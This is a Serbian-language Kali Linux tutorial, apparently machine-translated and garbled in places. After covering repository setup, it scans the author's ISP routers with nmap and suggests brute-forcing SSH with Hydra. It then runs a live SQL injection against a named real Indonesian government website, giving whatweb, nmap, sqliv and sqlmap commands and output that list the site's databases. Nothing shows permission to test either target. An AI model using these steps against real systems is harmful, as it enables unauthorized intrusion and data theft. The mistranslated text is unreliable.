Водич за Кали Линук

Kali Linux Tutorial



Ако сте стручњак или барем упознати са Линуком, командама и окружењем, управо сте инсталирали Кали Линук на свом рачунару, желите да постанете мајстор Кали Линукса или етички хакер, на правом сте месту. У овом чланку ћу се позабавити упутством за Кали Линук за кориснике Линука који још нису упознати са Кали и упознати вас са неким од основних техника које се користе за хаковање и безбедносно тестирање док користите Кали.

Шта је Кали Линук?

Кали Линук, ( премијерно објављено 13. марта 2013 ) који је формално био познат као БацкТрацк, а развила га је заштитарска фирма Оффенсиве Сецурити, дистрибуција је форензичке и безбедносне оријентације заснована на огранку Дебиан'с Тестинг. Кали Линук је дизајниран имајући у виду тестирање пенетрације, опоравак података и откривање претњи. Пројекат је раније ове године прешао на модел сталног издања у настојању да корисницима дистрибуције обезбеди више ажурираних безбедносних програма. Кали Линук је бесплатан и увек ће бити. Укључује 600+ алата за тестирање пенетрације.







Зашто Кали Линук? Да ли вам одговара?

Кали Линук је недавно стекао велику популарност. И иза тога постоји разлог. Хаковање се вратило као кул ствар у популарној култури и то се може значајно приписати ТВ серији Господин Робот. Популарност господина Робота помогла је Кали Линук -у у придобијању нових корисника. Људи који једва да знају Линук или било шта што се тиче рачунарске безбедности сада покушавају да користе Кали као своју главну дистрибуцију Линука.



Наша најнапреднија дистрибуција за тестирање пенетрације, икада. - Кали Линук Девелоперс. (Написано је на главној страници Кали.орг на самом врху странице.) Шта имате од те изјаве? Примећујете ли ово: АПТД (Адванцед Пенетратион Тестинг Дистрибутион)? Овде дословно не постоји термин хаковање. Кали Линук је исти као и друге Линук дистрибуције. Једноставно речено, то је дистрибуција Линука препуна алата за безбедност и намењена стручњацима за мрежну и рачунарску безбедност. Међутим, употреба Кали Линука фокусира се само на сигурност и форензику.



Линук дистрибуција није ништа друго до пакет који садржи Линук кернел, скуп основних услужних програма и апликација и неке подразумеване поставке. Дакле, Кали Линук не нуди нешто јединствено у том смислу већина понуђених алата би се могла инсталирати на било коју Линук дистрибуцију.





Кали Линук је посебно прилагођен да испуни захтеве професионалног пенетрационог тестирања и ревизије безбедности. Намењен је одређеном подскупу корисника Линука. Пентестери, хакери итд. Није препоручљива дистрибуција ако очекујете Кали за Линук опште намене за развој, веб дизајн, игре, канцеларију итд. Кали би вам могла поставити неке изазове, чак и ако сте искусни корисник Линука .

СТВАРИ КОЈЕ МОРАТЕ УЧИНИТИ НАКОН ИНСТАЛАЦИЈЕ КАЛИ ЛИНУКС -а

Након што инсталирате Кали Линук, можда ћете се запитати шта даље са овим, зар не ?. Сви се суочавају са овим проблемом, не брините.



КОРАК 1: ПОСТАВИТЕ РЕПОЗИТОРИЈУ

Прво, можда то већ знате, али је критично да исправно поставите спремиште. Као што сам рекао, Кали Линук покретни модел издања настоји да корисницима нове дистрибуције обезбеди најновије безбедносне помоћне програме. Генерално, ако имате Кали Линук свеже инсталиран, спремиште упућује на медије које користите за инсталирање. Да бисте ово решили, морате да промените спремиште у службено Кали Линук спремиште. Потребна датотека се налази испод /етц/апт/соурцес.лист . Отворите датотеку са уређивачем текста у плочи листова и замените подразумевано спремиште овим службеним складиштем Кали Роллинг:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

КОРАК 2: АЖУРИРАЈТЕ И НАДГРАДИТЕ СВОЈ КАЛИ ЛИНУКС

Након тог ажурирања и надоградње система, синхронизујте свој Кали Линук са најновијом верзијом. Да бисте то урадили, отворите терминал и откуцајте:

apt update -y && apt upgrade -y && apt dist-upgrade 

Наредба апт упдате преузима и преузима пакет са информацијама из спремишта и ажурира их да би добила информације о најновијим верзијама пакета и њиховим зависностима.

Наредба апт упграде преузима и инсталира новију верзију пакета инсталираних Кали Линук пакета све док нема грешака у зависности.

Апт дист-упграде ће без обзира на све ажурирати све пакете на најновију доступну верзију. Такође инсталирајте и уклоните зависности по потреби (инсталирајте зависности да бисте задовољили пакете, очигледно, али и уклоните зависности које су остале без родитеља ако пакету који је ажуриран више није била потребна зависност.

ОСНОВНИ КОНЦЕПТ ИСПИТИВАЊА ПЕНЕТРАЦИЈЕ СА КАЛИ ЛИНУКС -ом

Након што сте успешно извршили те кораке, постоје три главне ствари које можете да урадите са Кали Линук -ом на основу циљаног система, укључујући:

  1. Хакирање бежичне мреже - Хакирање Ви -Фи -ја, Пхисинг, АРП тровање итд.
  2. Хакирање веб апликација -СКЛ убризгавање, фалсификовање захтева на више локација (ЦСРФ), веб пхисинг итд.
  3. Хакирање уређаја - Искористите циљну машину да бисте стекли контролу над њом.

Не рачунам хаковање ИоТ -а, то не значи да Кали Линук нема способности за ту сврху. Али, буквално може припадати и хаковању уређаја. Пошто уређај има физички изглед и облик. У овом водичу покрио сам основно знање о њима. Пошто је Кали Линук огроман, не стане у један чланак!

Такође морате знати, циклус или поступак тестирања продора. Су:

  1. Извиђање - прикупљање информација
  2. Скенирање
  3. Операција
  4. Пост-експлоатација

БЕЗЖИЧНЕ МРЕЖЕ ХАКАЈУ СА КАЛИ ЛИНУКС -ом

У погледу хаковања бежичне мреже, жртва може варирати. Јер, бежичне мреже се састоје од неколико ствари, као што су ИСП (Интернет Сервице Провидер), рутер и његови пријатељи (модем, чвориште, прекидач итд.) И клијенти (корисници, ЦЦТВ, удаљени рачунар итд.). Они такође имају рањиве могућности.

Интернет је велика и сложена група мрежног хардвера, повезаног гатеваи -има. Праћење руте коју прате ваши пакети важно је како бисте знали како доспевате до одређеног имена хоста или циљане ИП адресе.

Кали Линук има уграђен алат који се зове Трацероуте. Трацероуте користи време ИП протокола за приказивање поља и покушава да изазове ИЦМП ТИМЕ_ЕКСЦЕЕДЕД одговор са сваког гатеваиа дуж путање до неког хоста. Трацероуте покушаји да пронађу руту коју би ИП пакет пратио до неког Интернет домаћина лансирањем пакета сонде са малим ТТЛ -ом (време за живот), затим слушање ИЦМП -а прекорачило је одговор са мрежног пролаза. Даћу вам пример и пример праћења ИСП рутера који се користи за управљање нашом везом помоћу Трацероуте -а.

1. Признање

Прикупљање информација је најважнији почетак, не пропустите овај корак. У овом кораку, наша сврха је да добијемо што је више могуће корисних информација које бисмо могли добити, а затим се те информације користе за даље кораке.

Прво отворите терминал и откуцајте ову команду да бисте започели праћење пута до веб локације, у овом случају сам веб локацију поставио на гоогле.цом.

traceroute google.com 

Трацероуте Сцреенсхот

2. Скенирање

Када покренемо команде, у њему ће бити наведено где се наш пакет налази у низу. Као што видите горе, добио сам 3 хопа, од којих је један мој ИСП сервер. Први ИП на листи је мој рутер, који делује као пролаз. А следећа два припадају мом ИСП -у. Хајде сада да проверимо услугу коју покрећу користећи Нмап. Дакле, циљеви које ћемо скенирати јесу 10.152.192.1 и 10.13.223.102 . У терминалу сам покренуо следећу команду:

nmap -v -sS [IP Target] -Pn 

Разложимо аргумент команде:

-в = Омогући режим детаљности

-сС = Користи технику скенирања ТЦП СИН

-Пн = Третирајте све хостове као онлине -прескочите откривање хоста

И ево резултата који смо добили.

снимак екрана нмап 2

Нажалост, сви портови су укључени 10.152.192.1 филтрирају, то значи да су све долазне ТЦП везе блокиране ИДС -ом или заштитним зидом на овој ИП адреси. Идемо сада поново скенирати другу мету.

снимак екрана нмап 1

3. Операција

У овом поступку немам намеру да спроводим стварну експлоатацију, већ ћу вам показати како. На основу горњег резултата скенирања Нмап -а знамо да овај ИП има ССХ сервер који ради на порту 22 и да је отворен. Отворено је за брутоформу, хаха! Пронашли смо рупу, овај ССХ сервер је могућа рупа у коју бисмо могли покушати да приступимо. У Кали Линуксу постоји неколико алата који подржавају брутефорце или речничке нападе на ССХ протокол. Најпопуларнији и најмоћнији је Хидра.

У реду, то је била основна процедура која је водила пенетрацијски тест против циљаног сервера, што је у нашем примеру овде мој ИСП сервер.

ВЕБ АПЛИКАЦИЈЕ ХАКУЈУ СА КАЛИ ЛИНУКС -ом

Заправо, ако сте страствени у овоме, можете поставити своје хакерско окружење инсталирањем ДВВА (Проклето рањива веб апликација) у свој Кали Линук. То је ПХП/МиСКЛ веб апликација која има хрпу рањивих рупа. Његови главни циљеви су да помогну стручњацима за безбедност да тестирају своје вештине и алате у правном окружењу, и да помогну веб програмерима да боље разумеју процесе заштите веб апликација. ДВВА можете бесплатно добити на Гитхуб -у овде: хттпс://гитхуб.цом/етхицалхацк3р/ДВВА.

За сада ћу вам показати како се хакира веб апликација на стварној веб локацији. Али, обећајте ми, то је ограничено само на образовне сврхе. Симулират ћемо прави напад на стварну веб локацију помоћу СКЛ ињекције.

Предуслов

Обухваћени алати:

-Вхатвеб (унапред инсталиран)

-Нмап (унапред инсталиран)

- СКЛив (инсталирајте ручно)

-СКЛМап (унапред инсталиран)

Потребан нам је још један додатни алат који је доступан на Гитхуб -у овде: хттпс://гитхуб.цом/Хадеси2к/склив, прво га инсталирајте на наш Кали Линук. Овај алат по имену СКЛив који може да изврши циљано скенирање пружајући одређени домен (са индексирањем). Унесите терминал:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Циљ: ввв.тренггалеккаб.го.ид

1. Признање

Прикупимо што је могуће више корисних информација. Могли бисмо отворити веб страницу и открити која апликација ради на овој веб локацији. Прво да проверимо о каквој се веб локацији ради. За то ћемо користити вхатвеб.

whatweb www.trenggalekkab.go.id 

Какав Веб Сцреенсхот

Као што видите горњи резултат, циљ се налази у Индонезији. Трчи Апацхе в2.2.27 на свом веб серверу и такође има ПХП в5.4.31 , има ИП адресу 103.247.21.142 . У реду, запамти то. Можда ћете морати да посетите њену веб страницу и тражите датотеку или страницу, параметре УРЛ -а или чак образац за пријаву. За сада нам је потребна та ИП адреса за следећи корак који је скенирање.

2. Скенирање

Као и раније, поново користимо Нмап за скенирање портова и услуга који раде на мети.

nmap -v -sS 103.247.21.142 

И ево резултата који смо добили:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Постоји гомила отворених портова који управљају сваком услугом на мети, али привлачи пажњу та мискл услуга на порту 3306. Указано је да ова веб локација користи мискл да управљају својим подацима у базама података. Затим, питам се има ли на овој веб страници рањивости СКЛ Ињецтион. Дакле, поново скенирам веб локацију користећи СКЛив који смо управо инсталирали. Уписао сам команду:

sqliv -t www.trenggalekkab.go.id 

СКЛХацкинг СцреенСхот1

На овој веб страници смо пронашли 2 могућа СКЛ осјетљива УРЛ -а. Забележите те УРЛ -ове.

3. Операција

У реду, имамо СКЛ рањиве УРЛ -ове и спремни смо за извршавање. За то ћемо користити СКЛМап. Синтакса је:

sqlmap [Vulnerable URL] --dbs 

Команда би требала изгледати овако:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Аргумент –дбс је да каже СКЛМап -у да добије циљне базе података. Ево резултата који смо добили:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

СКЛМап је пронашао 2 базе података, али само једна међу њима која садржи осетљиве податке, као што је налог акредитива администратора. То је на тренгкаб_трг. Након што смо пронашли базе података, постоји још један корак који бисмо требали учинити. То је проналажење табела и колона, а последњи корак је да се подаци избаце. Нећу вам показати како овде у овом одељку, користећи овај циљ. Бар знате основну идеју о циклусу напада и користите неке алате.

ХАКОВАЊЕ УРЕЂАЈА

У будућем чланку на овој веб страници покрити ћемо хаковање уређаја, будите у току. Као упозорење, желећете да се уверите да познајете неки Питхон за ово.